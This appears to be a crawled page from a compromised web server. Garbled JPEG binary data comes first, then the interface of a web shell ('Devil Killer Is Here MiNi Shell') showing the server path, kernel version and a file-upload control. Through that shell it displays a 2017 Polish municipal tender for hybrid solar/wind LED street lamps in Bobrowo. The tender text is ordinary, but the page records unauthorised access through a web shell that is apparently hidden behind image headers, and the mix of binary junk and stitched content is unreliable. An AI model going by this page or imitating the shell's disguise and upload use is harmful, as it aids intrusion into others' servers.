JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170203/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170203/19532-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.bobrowo.bip.net.pl' target='_blank'>http://www.bobrowo.bip.net.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 19532 - 2017
              z dnia 2017-02-03 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Bobrowo: Oświetlenie terenów publicznych Gminy Bobrowo lampami hybrydowymi ze źródłem światła typu LED
<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Gmina Bobrowo, krajowy numer identyfikacyjny
              87111838800000, ul.
               
              27,
              87327  
              Bobrowo, woj.
              kujawsko-pomorskie, państwo
              Polska, tel.
              056 495-18-24, e-mail
              bobrowo@samorzad.org.pl, faks
              056 495-18-10.
              <br />
              Adres strony internetowej (URL): www.bobrowo.bip.net.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b></div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />www.bobrowo.bip.net.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.bobrowo.bip.net.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Ofertę należy złozyć w formie pisemnej pod rygorem nieważności.<br />
                Adres:
                <br />Urząd Gminy w Bobrowie, Bobrowo 27, 87-327 Bobrowo pokój ne 12 (sekretariat).</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Oświetlenie terenów publicznych Gminy Bobrowo lampami hybrydowymi ze źródłem światła typu LED
<br /><b>Numer referencyjny: </b>BDG.217.5.2017<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b><br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>W ramach inwestycji przewiduje się budowę oświetlenia terenów publicznych Gminy Bobrowo 104 lampami hybrydowymi ze źródłem światła typu LED.
Szczegółowa lokalizacja lamp została przedstawiona na załączonych do niniejszego opracowania aktualnych mapach sytuacyjnowysokościowych wydanych przez Powiatowy Ośrodek Dokumentacji Geodezyjnej i Kartograficznej w Brodnicy. Oświetlenie solarne ma za zadanie poprawienie oświetlenia dróg, przystanków autobusowych, placów zabaw, terenów w obrębie obiektów kultury na terenie gminy w miejscach, gdzie infrastruktura energetyczna oświetleniowa jest niedostateczna.
3.1. Zestawienie lokalizacji lamp hybrydowych.
Bobrowo  9 szt.; Wądzyń  8 szt.;  Zgniłobłoty  3 szt.; Kruszyny Duże  - 4 szt.;  Brudzawy  5 szt. ; Dąbrówka  2 szt.; Buczek  4 szt.; Nieżywięć  8 szt. ; Grabowiec  4 szt. ; Kawki  5 szt. ; Tylice  4 szt. ; Małki  10 szt. ; Wymokłe  4 szt. ; Chojno  7 szt. ;  Budy  3 szt. ; Drużyny  5 szt. ; Kruszyny Szl.  4 szt. ; Grzybno  6 szt. ; Wichulec  3 szt. i Czekanowo  6 szt. 
3.2.  Projekt oświetlenia
Oświetlenie solarne zaprojektowano lampą hybrydową z oprawą typu LED o mocy 36W zasilaną przez dwa panele fotowoltaiczne o mocy min. 250W każdy i turbiną wiatrową o mocy minimum 400W. Turbinę wiatrową projektuje się z uwagi na słaby stopień nasłonecznienia terenu, gdzie będą montowane oprawy solarne, aby w okresach całkowitego zachmurzenia następowało doładowywanie akumulatorów przez turbinę wiatrową. Moc oprawy 36W. Napięcie zasilania oprawy 24V DC. Oprawa typu LED o mocy 36W z materiałów nierdzewnych o regulowanym kącie oświetlenia (ok. 30 stopni). Oprawa montowana na wysięgniku. Rozsył światła asymetryczny.
Dane hybrydowej lampy solarnej
Słup: 
- słup stalowy, grubościenny, obustronnie cynkowany, stal S235, 
- konstrukcja trzonu słupa oparta na ośmiokącie foremnym o zmiennym przekroju 
   (ostrosłup zbieżny), zakończony teleskopowo, wysokość trzonu słupa: minimum 6,5 m, 
- wysokość montażu siłowni wiatrowej: minimum 8,4 m,
- słup bez rewizji,
- przeliczony (ze względu na wagę systemu, powierzchnię paneli fotowoltaicznych,  
   siłowni wiatrowej oraz powierzchnię boczną oprawy oświetleniowej) do montażu 
   proponowanego ,systemu hybrydowego w I strefie wiatrowej zgodnie z normą PN EN  
   199114
Wysięgnik do montażu oprawy oświetleniowej:
- stalowy, obustronnie cynkowany,  długość min. 1,0 m,
- możliwość zmiany kąta nachylenia ( w zakresie 5°  25°) względem płaszczyzny  
  podłoża, po montażu oprawy oświetleniowej na wysięgniku i słupie,
- możliwość obrotu wokół pionowej osi słupa  masztu po zamontowaniu oprawy  
  oświetleniowej na wysięgniku i słupie w zakresie: 0360 stopni.
Fundament pod słup lampy hybrydowej:
-  prefabrykowany przeliczony (ze względu na wagę systemu oraz powierzchnię paneli 
   fotowoltaicznych i siłowni wiatrowej oraz szafki sterowniczej i powierzchni bocznej 
   oprawy oświetleniowej) pod montaż systemu lampy hybrydowej w I strefie wiatrowej 
   na słupie stalowym o wysokości 6,5 m, 
-  wymiary minimalne fundamentu: 450mm x 450mm x 1800 mm
-  zgodny z PNEN 14991:2010 (beton C25/30, klasa ekspozycji XF2)
Akumulator:
-  bezobsługowy głębokiego rozładowania  żelowy o projektowanej żywotności min. 12 
   lat
-  pojemność: minimum 220 Ah,
-  minimum 1300 cykli przy 30% głębokości cyklicznego dobowego rozładowania,
-  akumulatory muszą posiadać oryginalne naklejki lub nadruki z danymi znamionowymi
   pozwalające na ich identyfikację.
Nie dopuszcza się montażu akumulatorów i regulatorów: w ziemi, wewnątrz trzonu słupa oraz na półkach (w skrzynkach) poniżej górnej krawędzi słupa.
Szafka sterownicza i konstrukcja nośna paneli fotowoltaicznych siłowni wiatrowej systemu hybrydowego:
-  szafa stalowa wykonana w technologii nierdzewnej z blachy głęboko profilowanej,
-  ścianki boczne i podstawa perforowane zapewniające wentylację przestrzeni 
   wewnętrznej, w której zamontowane są akumulatory i układy elektroniczne wchodzące 
   w skład lampy hybrydowej,
-  płaszczyzna podstawy, na której umieszczone są akumulatory zorientowana w pozycji
   równoległej do płaszczyzny modułów fotowoltaicznych  tzn. akumulatory w szafce 
   (skrzynce) montowane są pod kątem,
-  szafa wyposażona w pokrywę (drzwiczki) zamykane z zabezpieczeniem przed 
   ingerencją osób trzecich,
-  w skrzynce blokada akumulatorów przed swobodnym przemieszczaniem się,
-  montaż skrzyni realizowany poprzez umieszczenie jej na szczycie centralnie i 
   symetrycznie względem osi pionowej słupa (masztu) oraz bezpośrednio pod panelami 
   fotowoltaicznymi,
-  szafa umożliwia płyną zmianę ustawienia modułów względem słońca w osi pionowej 
   słupa (masztu) w zakresie 0360 stopni.
Wspornik siłowni wiatrowej:
-  konstrukcja montażowa turbiny wiatrowej musi zapewniać jej zamocowanie w taki 
   sposób, że zarówno siłownia wiatrowa, łopaty rotora jak i jej układ mocowania nie   
   powodują zacieniania  padania cienia słonecznego z żadnego uchwytu, czy wspornika 
   systemu lampy hybrydowej na moduły fotowoltaiczne, niezależnie od pory dnia i 
   wysokości słońca nad horyzontem.
-  konstrukcja wspornika (górny wolny koniec do montażu siłowni wiatrowej) musi mieć
    podparcie (mocowanie) w odległości nie większej niż 850 mm, aby uniknąć drgań i 
    odchylania się siłowni wiatrowej od linii pionowej wspornika w przypadku 
    występowania większych podmuchów wiatru.
Moduły fotowoltaiczne  2 szt.
-  typ cel: polikrystaliczne,
-  moc maksymalna [Pmax]: minimum 250 W,
-  tolerancja mocy modułu: minimum +3%,
-  sprawność modułu: minimum 15,5 %
-  wymiary minimalne: 1629 x 989 x 40mm,
-  stopień ochrony puszki przyłączeniowej: minimum IP67,
-  wytrzymałość mechaniczna: minimum 8000 N/m2 (815 kg / m2),
-  front modułu: szkło hartowane z powłoką antyrefleksyjną o grubości min. 3,9 mm,
-  tył modułu  wielowarstwowa folia zabezpieczająca,
-  moduły muszą posiadać oryginalne naklejki lub nadruki z danymi znamionowymi 
   pozwalające na ich identyfikację,
Oprawa oświetleniowa LED o parametrach:
-  korpus oprawy wykonany z materiałów nierdzewnych,
-  montaż na wysięgnikach o średnicy 60mm,
-  oprawa zamontowana na wysokości min. 6,3m nad gruntem poniżej modułów
   fotowoltaicznych,
-  stopień ochrony oprawy: minimum IP 65, stopień ochrony złącza oprawy: IP 68,
-  oprawa musi posiadać: minimum 4 segmenty LED posiadające 4 ÷ 6 diod LED w 
   każdym segmencie,
-  diody LED wyposażone w soczewki wykonane z PMMA,
-  zasilacz LED o sprawności minimum 92%,
-  przy uszkodzeniu jednego modułu pozostałe moduły nadal będą świecić,
-  przy uszkodzeniu jednej diody LED (zwarcie) w module pozostałe diody modułu muszą 
   świecić,
-  oprawa wyposażona w szybę wykonaną ze szkła hartowanego o grubości minimum 
   4mm,
-  rozsył światła: asymetryczny do oświetlenia dróg, chodników, placów,
-  całkowita moc pobierana przez oprawę LED: 36W  0.5W, temperatura barwy 
   światła: 4000 K  100K, żywotność diod LED w oprawie: minimum 60 000 godzin 
   pracy, strumień świetlny oprawy LED: 4200÷5500 lm,
-  oprawa wyposażona w zewnętrzny radiator w celu optymalizacji pracy diod LED i 
   ochrony temperaturowej, przygotowana do pracy z automatyczną redukcją mocy przy 
   współpracy z regulatorem solarnym, wyposażona w zewnętrzną kontrolkę zasilania 
   (dioda LED), wykonana w III klasie ochronności
-  oprawa musi posiadać oryginalną naklejkę lub nadruk z danymi znamionowymi 
   pozwalający na jej identyfikację,
Siłownia wiatrowa o parametrach i funkcjach:
-  pozioma oś obrotu ze sterem tylnym,
-  prąd ładowania: minimum 6A przy prędkości wiatru 16 m/s,
-  ilość łopat wirnika: nie mniej niż 6,
-  prędkość startowa wiatru: 1,8 m/s lub mniejsza, maksymalna prędkość wiatru: 
   dostosowana do danej strefy wiatrowej,
-  generator 3fazowy, bez szczotkowy na magnesach neodymowych stałych z 
   nieruchomym wałkiem,
-  wyprowadzenie mocy z siłowni  2 przewodowe (+ i  ),
-  zabezpieczenie elektryczne przed zbyt silnym wiatrem,
-  zabezpieczenie mechaniczne przed zbyt silnym wiatrem (samoczynne odstawianie od 
   kierunku wiatru przy prędkości powyżej 16 m/s lub automatyczna regulacja kąta 
   natarcia łopat i ograniczenie mocy wyjściowej),
-  korpus siłowni wiatrowej zabezpieczony przed korozją
-  łopaty wirnika wykonane z włókna szklanego z dodatkiem nylonu.
Regulator do siłowni wiatrowej:
-  regulator wyposażony w algorytm kompensacji wpływu temperatury na wartość 
   napięcia ładowania, automatyczny trzy stopniowy tryb sterowania pracą siłowni 
   wiatrowej, automatyczny dwustopniowy tryb ładowania akumulatorów, zabezpieczenie 
   przed przeładowaniem, zabezpieczenie przed odwrotnym podłączeniem siłowni 
   wiatrowej, przełącznik ręczny PRACA  STOP,
-  funkcja automatycznego zabezpieczenia siłowni przed rozbieganiem się (automatyczne 
   hamowanie przy braku odbioru energii), funkcja automatycznej detekcji napięcia 12 / 24 
   VDC, 
-  3  kolorowa kontrolka LED informująca o aktualnym trybie pracy siłowni wiatrowej, 
-  3  kolorowa kontrolka LED informująca o stanie naładowania akumulatora,
-  sygnalizacja rozładowania akumulatorów przez pulsowanie kontrolki LED,
-  stopień ochrony obudowy: minimum IP66,
Regulator solarny o parametrach i funkcjach:
-  prąd znamionowy modułów fotowoltaicznych: minimum 13 A,
-  moc wejściowa modułów fotowoltaicznych: minimum 500W/24VDC
-  znamionowe napięcie pracy 12 / 24 VDC wybierane automatycznie,
-  algorytm działania regulatora MPPT ( Multi Point Power Tracking ),
-  funkcja automatycznego sterownika zmierzchowego oprawy oświetleniowej, funkcja 
   zegara astronomicznego  włącznik czasowy
-  sprawność regulatora: minimum 95% przy podłączeniu dwóch modułów po 250 Wp 
   każdy stopień ochrony obudowy: minimum IP66,
-  zakres dobowy dowolnie programowanych godzin włączenia/wyłączenia oprawy LED 
   w normalnym trybie pracy od 1 do 16 godzin z pełną lub zredukowaną mocą oprawy, 
-  możliwość wyboru trybu AUTO  włączenia automatycznej funkcji redukcji mocy 
   oprawy w zależności od stanu naładowania akumulatorów bez zmiany czasu świecenia,
-  wbudowany bezprzewodowy moduł komunikacyjny Bluetooth  komunikacja z 
   aplikacją do programowania i serwisowania ( programem) po wprowadzeniu 
   indywidualnego kodu regulatora, zabezpieczenia komunikacji (dostępu) przez 
   indywidualny kod PIN,
-  możliwość zdalnego programowania i serwisowania przy użyciu aplikacji (programu) 
   przez wbudowany moduł komunikacyjny Bluetooth. Minimalny zasięg komunikacji: 10 
   m możliwość automatycznego sterowania redukcją mocy oprawy LED. Nie dopuszcza 
   wyłączania modułów LED jako redukcji mocy,
-  optyczna sygnalizacja: napięcia pracy, stanu zewnętrznego czujnika temperatury, 
   załączenia oprawy oświetleniowej, redukcji mocy, ładowania akumulatorów, 
   awaryjnych trybów pracy z kodem pulsacyjnym usterki minimalna sygnalizacja, 
-  awaryjnych trybów pracy: zbyt wysokie napięcie, zbyt wysoka temperatura, 
   przeciążenie lub zwarcie, niskie napięcie akumulatorów, 
-  podgląd powyższych stanów alarmowych oraz ich ilości w trybie online oraz off
   line musi umożliwiać również aplikacja do komunikacji bezprzewodowej.
Komputer przenośny z interfejsem Bluetooth z zainstalowaną aplikacją (programem) do zdalnego programowania i serwisowania wszystkich lamp hybrydowych: 
Aplikacja (program) do obsługi musi posiadać interfejs w języku polskim.
Aplikacja w trybie połączenia (online) powinna umożliwiać:
- komunikację z regulatorem danej lampy hybrydowej po wprowadzeniu indywidualnego
   kodu regulatora,
-  minimalny zasięg komunikacji bezprzewodowej między aplikacją Bluetooth a 
   regulatorami solarnymi w terenie otwartym: 10 m,
-  możliwość bezprzewodowego odczytu i zapisu na komputerze danych historycznych z 
   pamięci regulatora od momentu zainstalowania i uruchomienia lampy hybrydowej,
-  możliwość ustawieni dobowego programu załączenia/wyłączenia lampy w zakresie od 
   1 do 16 godzin (każda godzina programowana niezależnie),
-  możliwość włączenie lub wyłączenie funkcji redukcji mocy oprawy oświetleniowej 
   LED w programie działania oprawy,
-  możliwość wyboru trybu AUTO  włączenia automatycznej funkcji redukcji mocy 
   oprawy w zależności od stanu naładowania akumulatorów bez zmiany czasu świecenia,
Zalecenia końcowe:
  -  Panele słoneczne ustawić w kierunku południowym. 
  -  W czasie budowy oświetlenia przestrzegać wymagań zawartych w uzgodnieniach z 
      właścicielami pasów drogowych. 
  -  Opracować na swój koszt projekty organizacji ruchu na czas budowy zgodnych z
      obowiązującymi przepisami oraz uzyskanie w tym zakresie wymaganych prawem
      uzgodnień i przedłożenie projektów Zamawiającemu do akceptacji; 

  -   W przypadku usytuowania latarni w pobliżu korony drzew, należy w porozumieniu z 
       gminnymi służbami dokonać prześwietlenia gałęzi. 
  -   Po zakończeniu budowy wykonać dokumentację inwentaryzacyjną geodezyjną 
       powykonawczą.
  -   Prace wykonać zgodnie z dokumentacją, przepisami BHP, normami oraz warunkami 
       technicznymi wykonania i odbioru robot budowlanych.
3.3. Przedmiot zamówienia obejmuje również organizację placu budowy, zabezpieczenie  
       terenu budowy, wykonanie niezbędnych prób i badań, uporządkowanie terenu po 
       zakończeniu robót oraz wykonanie innych robot wymaganych technologią.
3.4. Szczegółowy opis przedmiotu zamówienia oraz warunki jego realizacji zawiera:  
	dokumentacja projektowa obejmująca projekty budowlano-wykonawcze, 
	szczegółowe specyfikacje techniczne, 
	przedmiary robót, kosztorys ofertowy. 
3.5. Oznaczenie przedmiotu zamówienia wg Wspólnego Słownika Zamówień (CPV):  
      
<br /><br /><b>II.5) Główny kod CPV: </b>31520000-7<br /><br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 21/08/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b>Zamawiający wymaga, aby przedmiot zamówienia został zrealizowany w terminie od dnia
odpisania umowy:
do dnia 20 czerwca 2017r. - 4 szt. w Grabówcu
        do dnia 21 sierpnia 2017r.  pozostałe.
</div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający nie precyzuje w tym zakresie żadnych warunków, których spełnianie
  wykonawca zobowiązany jest wykazać w sposób szczególny. 
<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                  Zamawiający nie precyzuje w tym zakresie żadnych warunków, których spełnianie
  wykonawca zobowiązany jest wykazać w sposób szczególny. 
<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                1. Wykonawca musi udowodnić, iż wykonał (zrealizował i zakończył) nie wcześniej niż w okresie ostatnich pięciu lat przed upływem terminu składania ofert w niniejszym postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, łącznie co najmniej 50 szt. punktów oświetlenia terenów publicznych lampami hybrydowymi ze źródłem typu LED
2. Wykonawca musi wykazać, iż będzie dysponował osobami, które będą     uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnymi za kierowanie robotami budowlanymi tj. minimum: kierownikiem budowy z        uprawnieniami budowlanymi do kierowania robotami w specjalności           konstrukcyjno-budowlanej lub  instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych
 Uwaga: przez uprawnienia budowlane rozumie się uprawnienia wydane na
 podstawie rozporządzenia Ministra Infrastruktury i Rozwoju z dnia 11 września 2014 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2014 r. poz. 1278) lub odpowiadające im ważne uprawnienia wydane na podstawie wcześniej obowiązujących przepisów, lub odpowiadające im uprawnienia budowlane, które zostały wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12a oraz innych przepisów ustawy z dnia 7 lipca 1994 r. Prawo budowlane (t.j. Dz. U. z 2016 r. poz. 290 ze zm.) oraz ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2016 r. poz. 65). 
<br />
